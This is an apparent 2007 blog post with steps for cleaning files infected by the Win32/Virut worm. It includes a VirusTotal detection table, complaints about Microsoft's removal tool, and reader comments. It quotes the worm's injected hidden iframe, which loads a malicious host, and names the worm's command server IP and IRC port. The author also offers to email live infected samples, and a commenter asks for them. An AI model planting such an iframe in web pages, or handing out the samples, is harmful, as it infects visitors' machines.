-
-
I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms. Don’t used “auto-clean/fix” online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you’ll need a search and replace tools for removing the embed code inside the infected files.
- Make sure all of the infected (*.exe win32/virtob) files has been quarantine.
- Optionally block outbound access to 78.109.19.139:80 & irc port 65520 in your firewall settings.
- Disabled AntiVirus if any.
- Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen).
- Search all files with *.htm, *.html, *.php, *.asp extensions.
delete or replace the following text (strings)<iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>
Search and Replace Tools
- For windows - there is lots of similar tools and I’m not sure which one to recommend as it seem most did the same thing so Google for “search-and-replace” pick your best.
- For Cygwin or *nix bash console - Used sed commands to search & replace strings in all infected files.
- Python in windows - You can try this solutions.
Win32/Virut Virustotal.com Results
Antivirus Version Last Update Result AhnLab-V3 2007.11.12.0 2007.11.12 - AntiVir 7.6.0.34 2007.11.12 W32/Virut.AF Authentium 4.93.8 2007.11.10 - Avast 4.7.1074.0 2007.11.11 Win32:Virtob AVG 7.5.0.503 2007.11.11 Win32/Virut BitDefender 7.2 2007.11.12 Win32.Virtob.6.Gen CAT-QuickHeal 9.00 2007.11.12 W32.Virut.K ClamAV 0.91.2 2007.11.12 W32.Virut-5 DrWeb 4.44.0.09170 2007.11.12 Win32.Virut.19 eSafe 7.0.15.0 2007.11.08 - eTrust-Vet 31.2.5289 2007.11.12 Win32/Virut.6375 Ewido 4.0 2007.11.12 - FileAdvisor 1 2007.11.12 - Fortinet 3.11.0.0 2007.10.19 W32/Virut.AE F-Prot 4.4.2.54 2007.11.10 W32/Injector.A.gen!Eldorado F-Secure 6.70.13030.0 2007.11.12 Virus.Win32.Virut.ab Ikarus T3.1.1.12 2007.11.12 Win32.Virtob.AS Kaspersky 7.0.0.125 2007.11.12 Virus.Win32.Virut.ab McAfee 5160 2007.11.09 W32/Virut.g Microsoft 1.3007 2007.11.12 Virus:Win32/Virut.Q NOD32v2 2653 2007.11.12 - Norman 5.80.02 2007.11.09 W32/Virut.W Panda 9.0.0.4 2007.11.11 W32/Virutas.W Prevx1 V2 2007.11.12 - Rising 20.18.02.00 2007.11.12 Win32.Virut.z Sophos 4.23.0 2007.11.12 W32/Vetor-G Sunbelt 2.2.907.0 2007.11.09 VIPRE.Suspicious Symantec 10 2007.11.12 W32.Virut.W TheHacker 6.2.9.124 2007.11.12 W32/Virut.gen VBA32 3.12.2.4 2007.11.11 - VirusBuster 4.3.26:9 2007.11.11 Win32.Virut.Gen.4 Webwasher-Gateway 6.0.1 2007.11.12 Win32.Virut.AF Notes on Microsoft Windows Malicious Software Removal Tool
Update On: Nov,20 2007 by NoahArk
I have Win.32/virut files in my archive (for backup purpose). Last week I installed Microsoft Windows Malicious Software Removal tool v1.35 (Nov 13, 2007, KB890830).
Microsoft’s claimed this tool can fixes w32/Virut . But the results is much worsed than I expected. It doesn’t detect Win32/Virut on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob & Virut[A-W] (infecting *.exe & *.html). I’d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products.I still keep the infected Win32/Virut files, if anyone need it please send an email to
. My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client’s (including me) wont have to hunt down on pricey antivirus solutions. W32/Virut and ntkrnlpa.info
The worms started spreading since September 2006. After one year anniversay It still in the wild like it will never stop.
I’d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. And also google is blocking the site too it will give you a warning notice if search for the particular url.
This worm spread via simple html tags and increased the filesize around 8kb. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. The thread label is debatable.
Based on wikipedia “Usage share of Web Browser Statistics”, 81% of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn’t blocked IFRAME that can be a problem.
Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. The results could be disaster. Nobody want to see its happening.
Related Entries
-
- November 12, 2007 at 12:35 pm
- February 8, 2008 at 10:58 am
- 0.3
- url
-
-
-
2 Responses to “Fixes for files infected with Win32/virut.Virtob and Variants”
Trackback URL: Use the TrackBack url ↑ to ping this article. If your blog does not support Trackbacks you might want to leave a comment instead.
-
-
"write as if you were talking to a good friend (in front of your mother)."
.haveyoursay
Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.
-
The problem in prevention of viruses like the Virut types is that they change the "bothosts" as well as the as the encryption with every new variant coming out. A possible good solution to prevent your machine from making unauthorized unwanted connects by any unknown process or program is to have e.g. a ZoneAlarm firewall installed (which allows precisely blocking of e.g. STMP for specified programs - the default is 'blocked' - , specified port blocking (e.g. IRC), preventing and denying any unsolicited inbound traffic, as well as the adaptive IDENT port hiding,(means this is a true stealth firewall).and specified security behavior concerning internet, intranet, local, safe zones, as well as a 5-step safety profile to set for specified programs).
Additionally the user is informed about every network action and access attempts - ingoing as well outgoing - with source,
target, port and the program or process name which initiates the connection. Preventing spam-bot behavior means : only allow 'your' known Mail programs to send mails. NEVER store ANY PASSWORDS on the machine or in the mail program! Set 'SMTP action' to 'password required' even if your SMTP provider doesn't need (if so this means anonymous SMTP is allowed, then you
have a BAD ISP which is really inviting spambots to spread their notorious garbage all around the world!).
Essential Safety-rules are still ignored by the ISP in such cases. By the same way, the customers of such ISP are the victims of these. Go looking for another ISP if possible. All other programs should be blocked for SMTP (and IRC) protocols as well. That is essential in those days to keep an infected machine quiet towards the internet even if it is eventually infected by some weird worm, or botclient software. (Then your PC is called 'stoned' or how it is also said by the security people, a so-called 'Zombie'). Never allow HTTP or any other outgoing requests for other programs aside of your known browser, media-players or
file transfer, mail and chat programs. Be aware that especially 'Adware','Nag-Ware' and 'Spy-ware'-charged programs are always trying to 'phone home'!
Same does Malware which attempts to reach or at least listens to their 'master hosts', (of course allow such for the safety facilities on your system to update themselves by their known code hosts). Using a host list which redirects therein contained servers to nowhere (means the localhost) is also a good hint. This file is also protected from being tampered with (unauthorized deletions or additions by any software or website scripts) by third party software (ie ZoneAlarm, McAffee, Nod32).
hi there
can u please email me these files I just wanna use them for learning purpose
THANKS BUDDY